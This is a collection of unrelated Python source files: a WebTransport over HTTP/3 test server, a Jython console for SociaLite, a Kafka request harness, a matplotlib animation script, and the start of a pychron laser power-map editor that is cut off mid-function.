| source | python |
|---|---|
webtransport_h3_server.py
|
# mypy: allow-subclassing-any, no-warn-return-any
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import logger as quic_connection_logger # type: ignore
from aioquic.quic.connection import stream_is_unidirectional
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
# Set aioquic's log level to WARNING to suppress some INFO logs which are
# recorded on every connection close.
quic_connection_logger.setLevel(logging.WARNING)
class H3ConnectionWithDatagram04(H3Connection):
"""
An H3Connection subclass that works with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
# https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-h3-websockets-00#section-5
ENABLE_CONNECT_PROTOCOL = 0x08
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
settings[H3ConnectionWithDatagram04.ENABLE_CONNECT_PROTOCOL] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
f"Unimplemented capsule type: {capsule.type}")
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
WEBTRANSPORT_FORMAT_TYPE = 0xff7c00
if format_type != WEBTRANSPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except OSError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
(b"sec-webtransport-http3-draft", b"draft02"),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
# Use a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warning(
"Sending a datagram when that's not allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
# TODO(yutakahirano): Make sure this is the correct logic.
# Chrome always uses 0 for the initial stream and the initial flow
# ID, so we cannot verify the correctness with it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warning(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
A WebTransport over HTTP/3 server for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check whether the WebTransport over HTTP/3 server is running at the given `host` and
`port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
|
console.py
|
import SociaLite
import sys
from SociaLite import SociaLiteException
from impSocialite import SocialiteImporter
import __builtin__
from code import InteractiveConsole
import org.python.util.PythonInterpreter as PythonInterpInJava
class PythonInterpAdapter(PythonInterpInJava):
def __init__(self, socialite):
import sys
self.socialite = socialite
try:
self.realInterp = sys._jy_interpreter
except:
print "Attribute _jy_interpreter does not exist in sys module"
self.realInterp = None
def getLocals(self):
return self.socialite.locals
def get(self, name):
return self.socialite.locals[name]
def getSystemState(self):
from org.python.core import Py
if not self.realInterp: return Py.getSystemState()
return self.realInterp.getSystemState()
class SociaLiteConsole(InteractiveConsole):
def __init__(self, cpu=None, verbose=False):
InteractiveConsole.__init__(self)
self.filename="<stdin>"
self.inQuery = False # True if the shell is in SociaLite query
self.compiler = None
self.declBegin = None
self.declEnd = None
self.locals={}
from impSocialite import setSocialiteVars
setSocialiteVars(self.locals)
self.locals["__name__"] = "__main__"
self.adapter = PythonInterpAdapter(self)
import socialite.functions.PyInterp as PyInterp
PyInterp.set(self.adapter)
def initLocals(self, _locals=None):
if _locals:
for k,v in _locals.iteritems():
self.locals[k] = v
def asyncImportPyparsing(self):
def importPyparsing():
import time
time.sleep(0.001)
import pyparsing
from threading import Thread
t=Thread(target=importPyparsing)
t.start()
def runsource(self, source, filename="<stdin>", symbol="single"):
if not self.compiler:
from pysoc import compiler
self.compiler = compiler
source = self.compiler.compile(source)
try :
return InteractiveConsole.runsource(self, source, filename, symbol)
except SystemExit, e:
sys.exit(0)
except SociaLiteException, e:
print e.getMessage()
except:
import traceback
try:
tp, value, tb = sys.exc_info()
sys.last_type = tp
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
list = traceback.format_list(tblist)
if list:
list.insert(0, "Traceback (most recent call last):\n")
list[len(list):] = traceback.format_exception_only(tp, value)
finally:
tblist = tb = None
map(sys.stderr.write, list)
def hasDeclBegin(self, line):
if line.lstrip().find("`") == 0:
return True
return False
def hasDeclEnd(self, line):
l = line.rstrip()
if l.find("`") == len(l)-1:
return True
return False
def __hasDeclBegin(self, line):
if not self.declBegin:
import pyparsing as p
self.declBegin = p.stringStart+p.Literal("`")
self.declBegin.ignore(p.pythonStyleComment)
self.declBegin.ignore(p.quotedString)
if self.declBegin.searchString(line.strip()):
return True
return False
def __hasDeclEnd(self, line):
if not self.declEnd:
import pyparsing as p
self.declEnd = p.Literal("`") + p.stringEnd
self.declEnd.ignore(p.pythonStyleComment)
self.declEnd.ignore(p.quotedString)
if self.declEnd.searchString(line.strip()):
return True
return False
def interact(self, banner=None):
try:
InteractiveConsole.interact(self, banner)
except KeyboardInterrupt:
if self.inQuery:
self.inQuery = False
self.buffer = []
print "Enter quit() or Ctrl-D to exit"
def push(self, line):
if self.inQuery:
if self.hasDeclEnd(line):
self.inQuery= False
more = InteractiveConsole.push(self, line)
return more
elif line.find("`") >= 0:
exc = 'Traceback (most recent call last):\n' + \
' File "<stdin>", line 1, in <module>\n' + \
' Cannot have both Python code and SociaLite query in one line\n'
print exc
self.buffer = []
self.inQuery = False
return False
else:
if line.strip():
self.buffer.append(line)
return True
else:
if self.hasDeclBegin(line) and not self.hasDeclEnd(line):
self.inQuery = True
self.buffer.append(line)
return True
more = InteractiveConsole.push(self, line)
return more
def getBanner():
banner = """
SociaLite 0.8.0-alpha
Type "help" for more information.
Type "quit()" to quit."""
return banner
def interact(verbose=0):
sys.path.insert(0, '')
banner = getBanner()
console = SociaLiteConsole(verbose=verbose)
console.interact(banner)
def run_files(args, verbose=0, inspect=False):
sys.argv = args
filename = args[0]
args = args[1:]
import java.io.File as File
abspath = File(filename).getAbsolutePath()
path = str(abspath[0:abspath.rindex(File.separator)])
sys.path.insert(0, path)
program=open(filename).read()
from pysoc import compiler
src = compiler.compile(program)
from impSocialite import addMod, loadMod, setSocialiteVars
sys.modules.pop("__main__", None)
class FakeConsole:
def __init__(self):
self.locals = None
console = FakeConsole()
adapter = PythonInterpAdapter(console)
import socialite.functions.PyInterp as PyInterp
PyInterp.set(adapter)
mod = addMod("__main__")
setSocialiteVars(mod.__dict__)
console.locals = mod.__dict__
try:
import java.lang.System as Sys
mod = loadMod("__main__", src, filename)
#exec src in locals
except SystemExit:
sys.exit(0)
except:
# adapted from code.py::InteractiveInterpreter::showtraceback
import traceback
try:
tp, value, tb = sys.exc_info()
sys.last_type = tp
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
list = traceback.format_list(tblist)
if list:
list.insert(0, "Traceback (most recent call last):\n")
list[len(list):] = traceback.format_exception_only(tp, value)
finally:
tblist = tb = None
map(sys.stderr.write, list)
sys.exit(1)
if inspect:
console = SociaLiteConsole(verbose=verbose)
console.initLocals(mod.__dict__)
console.interact("")
def installKeyboardInterruptHandler():
def handler(signum, frame):
print "Enter quit() or Ctrl-D to exit"
import signal
signal.signal(signal.SIGINT, handler)
def show_cluster_status():
SociaLite.status()
def main():
usage ="usage: socialite [options] [script] [script args]"
from optparse import OptionParser
parser=OptionParser(usage)
parser.add_option("-v", "--verbose", action="store_true", dest="v",
help="Run SociaLite script with verbose level=1")
parser.add_option("-c", "--cpu", type="int", default=None, dest="cpu",
help="Set # of cpu to be used")
parser.add_option("-i", action="store_true", dest="inspect",
help="inspect interactively after running script")
parser.add_option("-d", "--dist", action="store_true", dest="dist",
help="Run SociaLite script on a distributed cluster (see conf/ for cluster info). ")
opts, args = parser.parse_args()
interactive = False
if len(args)==0:
interactive = True
if opts.cpu==None: SociaLite.init(dist=opts.dist, interactive=interactive, verbose=opts.v)
else: SociaLite.init(opts.cpu, dist=opts.dist, interactive=interactive, verbose=opts.v)
if opts.dist: show_cluster_status()
import atexit
atexit.register(SociaLite.cleanupOnExit)
sys.meta_path.insert(0, SocialiteImporter())
if interactive:
installKeyboardInterruptHandler()
interact(verbose=opts.v)
else:
run_files(args, verbose=opts.v, inspect = opts.inspect)
if __name__=='__main__':
main()
|
harness.py
|
import random
import signal
import string
import sys
import time
import threading
from datetime import datetime
from kafka.errors import NoBrokersAvailable
from kafka import KafkaProducer
sys.path.insert(1, 'protocols/src/generated/main/python/')
from kafka_topic_pb2 import KafkaTopicRequest
from kafka_user_pb2 import KafkaUserRequest
"""
Run a Kafka producer to send the data to the 'request' ingress topics
Commands:
add-topic: Request to add a Kafka topic
remove-topic: Request to remove a Kafka topic
add-user: Request to add a Kafka user
remove-user: Request to remove a Kafka user
add-credential: Request to add a Kafka credential
revoke-credential: Request to revoke a Kafka credential
"""
KAFKA_ADDR = "localhost:9092"
def produce_add_topic_request(args):
request = KafkaTopicRequest()
request.topic_name = args[0]
request.add_requested.partition_count = 1
request.add_requested.replication_factor = 1
request.add_requested.topic_config["cleanup.policy"] = "delete"
if len(args) > 1:
wait_time = convert_duration(args[1])
if wait_time > 0:
request.add_requested.delete_policy.wait_time = wait_time * 1000
request.add_requested.delete_policy.log_size_policy.lte_size = 1
key = request.topic_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-topic-requests', key, val)
def produce_remove_topic_request(args):
request = KafkaTopicRequest()
request.topic_name = args[0]
request.remove_requested.SetInParent()
key = request.topic_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-topic-requests', key, val)
def produce_add_user_request(args):
request = KafkaUserRequest()
request.user_name = args[0]
request.add_requested.quotas["consumer_byte_rate"] = 2 * 1049600
request.add_requested.quotas["producer_byte_rate"] = 1049600
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def produce_remove_user_request(args):
request = KafkaUserRequest()
request.user_name = args[0]
request.remove_requested.SetInParent()
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def produce_add_credential_request(args):
identifier = f'{args[0]}.{credential_nonce()}'
secret_text = 'statefun'
expires_in = 60
if len(args) > 1:
expires_in = convert_duration(args[1], expires_in)
request = KafkaUserRequest()
request.user_name = args[0]
request.add_credential_requested.identifier = identifier
request.add_credential_requested.secret_value = secret_text
request.add_credential_requested.expiration_time = (int(datetime.now().timestamp()) + expires_in) * 1000
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
print(f'Your new SASL credential is username={identifier} password={secret_text} expires-in={int(expires_in)}s')
def produce_revoke_credential_request(args):
identifier = args[0]
(user_name, _nonce) = identifier.split(".", maxsplit=1)
request = KafkaUserRequest()
request.user_name = user_name
request.revoke_credential_requested.identifier = identifier
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def credential_nonce():
return "".join([random.choice(string.ascii_uppercase) for n in range(8)])
def convert_duration(val, default_value = 0):
if val == '1m':
return 60
if val == '2m':
return 120
if val == '3m':
return 180
if val == '4m':
return 240
if val == '5m':
return 300
return default_value
def produce_message(topic, key, value):
producer = KafkaProducer(
bootstrap_servers=[KAFKA_ADDR],
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="PLAIN",
sasl_plain_username="statefun",
sasl_plain_password="statefun",
)
producer.send(topic, key=key, value=value)
producer.flush()
def safe_loop(fn, args):
while True:
try:
fn(args)
return
except SystemExit:
print("Good bye!")
return
except NoBrokersAvailable:
time.sleep(2)
continue
except Exception as e:
print(e)
return
def term_handler(number, frame):
sys.exit(0)
def usage(exit_code):
print("harness.py [add-topic|remove-topic|add-user|remove-user|add-credential|revoke-credential] additional_args...")
sys.exit(exit_code)
def main(arg, extra_args):
signal.signal(signal.SIGTERM, term_handler)
if arg == "add-topic":
producer = threading.Thread(target=safe_loop, args=[produce_add_topic_request, extra_args])
producer.start()
producer.join()
if arg == "remove-topic":
producer = threading.Thread(target=safe_loop, args=[produce_remove_topic_request, extra_args])
producer.start()
producer.join()
if arg == "add-user":
producer = threading.Thread(target=safe_loop, args=[produce_add_user_request, extra_args])
producer.start()
producer.join()
if arg == "remove-user":
producer = threading.Thread(target=safe_loop, args=[produce_remove_user_request, extra_args])
producer.start()
producer.join()
if arg == "add-credential":
producer = threading.Thread(target=safe_loop, args=[produce_add_credential_request, extra_args])
producer.start()
producer.join()
if arg == "revoke-credential":
producer = threading.Thread(target=safe_loop, args=[produce_revoke_credential_request, extra_args])
producer.start()
producer.join()
if __name__ == "__main__":
args = sys.argv[1:]
if len(args) < 2:
usage(0)
if args[0] not in ["add-topic", "remove-topic", "add-user", "remove-user", "add-credential", "revoke-credential"]:
usage(1)
main(args[0], args[1:])
|
matplotlib_testing.py
|
import numpy as np
import matplotlib
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
import matplotlib.pyplot as plt
from SDAWithVectorField import *
from MovingObstacleSimulator import *
import matplotlib.patches as patches
from datetime import datetime
import sched, time
import random
import mpl_toolkits.mplot3d.axes3d as p3
import matplotlib.animation as animation
import multiprocessing
# fig = plt.figure()
# ax = p3.Axes3D(fig)
# # create the parametric curve
# t=np.arange(0, 2*np.pi, 2*np.pi/100)
# x=np.cos(t)
# y=np.sin(t)
# z=t/(2.*np.pi)
# # create the first plot
# point, = ax.plot([x[0]], [y[0]], [z[0]], 'o')
# line, = ax.plot(x, y, z, label='parametric curve')
# ax.legend()
# ax.set_xlim([-1.5, 1.5])
# ax.set_ylim([-1.5, 1.5])
# ax.set_zlim([-1.5, 1.5])
# # second option - move the point position at every frame
# def update_point(n, x, y, z, point):
# point.set_data(np.array([x[n], y[n]]))
# point.set_3d_properties(z[n], 'z')
# return point
# ani=animation.FuncAnimation(fig, update_point, 99, fargs=(x, y, z, point))
# plt.show()
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
my_manager = multiprocessing.Manager()
x = my_manager.list()
y = my_manager.list()
def makeUpdates(x, y):
index = 0
while True:
x.append(index**2)
y.append(index)
index += 1
time.sleep(1)
def animate(i, x, y):
print(x)
print(y)
ax1.clear()
ax1.plot(x,y)
multiprocessing.Process(target=makeUpdates, args=(x, y,)).start()
ani = animation.FuncAnimation(fig, animate, fargs=(x, y,), interval=1000)
plt.show()
|
power_map_editor.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from __future__ import absolute_import
from pychron.core.ui import set_qt
set_qt()
# ============= enthought library imports =======================
from traits.api import HasTraits, Instance, Float, Int, Bool, DelegatesTo, Range
from traitsui.api import View, Item, UItem, VGroup, HGroup, spring
# from pychron.envisage.tasks.base_editor import BaseTraitsEditor
# from pychron.loggable import Loggable
# from pychron.canvas.canvas2D.raster_canvas import RasterCanvas
from enable.component_editor import ComponentEditor
from pychron.lasers.power.power_mapper import PowerMapper
from pychron.core.ui.thread import Thread
from pychron.lasers.power.power_map_processor import PowerMapProcessor
from pychron.managers.data_managers.h5_data_manager import H5DataManager
# from pychron.graph.graph import Graph
# from pychron.graph.contour_graph import ContourGraph
# from chaco.plot_containers import HPlotContainer
from pychron.lasers.tasks.editors.laser_editor import LaserEditor
# ============= standard library imports ========================
# ============= local library imports ==========================
class PowerMapControls(HasTraits):
beam_diameter = Float(1)
request_power = Float(1)
padding = Float(1.0)
step_length = Float(0.25)
center_x = Float(0)
center_y = Float(0)
integration = Int(1)
discrete_scan = Bool(False)
def traits_view(self):
v = View(
VGroup(
Item("discrete_scan"),
Item("beam_diameter"),
Item("request_power"),
Item("padding"),
Item("step_length"),
Item("center_x"),
Item("center_y"),
)
)
return v
class PowerMapEditor(LaserEditor):
percent_threshold = Range(0.0, 100.0)
beam_diameter = Float
power = Float
# canvas = Instance(RasterCanvas, ())
editor = Instance(PowerMapControls, ())
mapper = Instance(PowerMapper, ())
completed = DelegatesTo("mapper")
# was_executed = False
processor = Instance(PowerMapProcessor)
def _percent_threshold_changed(self, new):
if self.processor:
self.processor.set_percent_threshold(new)
def load(self, path):
pmp = PowerMapProcessor()
reader = H5DataManager()
reader.open_data(path)
cg = pmp.load_graph(reader)
self.beam_diameter, self.power = pmp.extract_attrs(["beam_diameter", "power"])
self.component = cg.plotcontainer
self.was_executed = True
self.processor = pmp
def _do_execute(self):
mapper = self.mapper
mapper.laser_manager = self._laser_manager
editor = self.editor
padding = editor.padding
# if editor.discrete_scan:
# mapper.canvas = self.canvas
# self.component = self.canvas
# else:
c = mapper.make_component(padding)
self.component = c
bd = editor.beam_diameter
rp = editor.request_power
cx = editor.center_x
cy = editor.center_y
step_len = editor.step_length
t = Thread(
target=mapper.do_power_mapping, args=(bd, rp, cx, cy, padding, step_len)
)
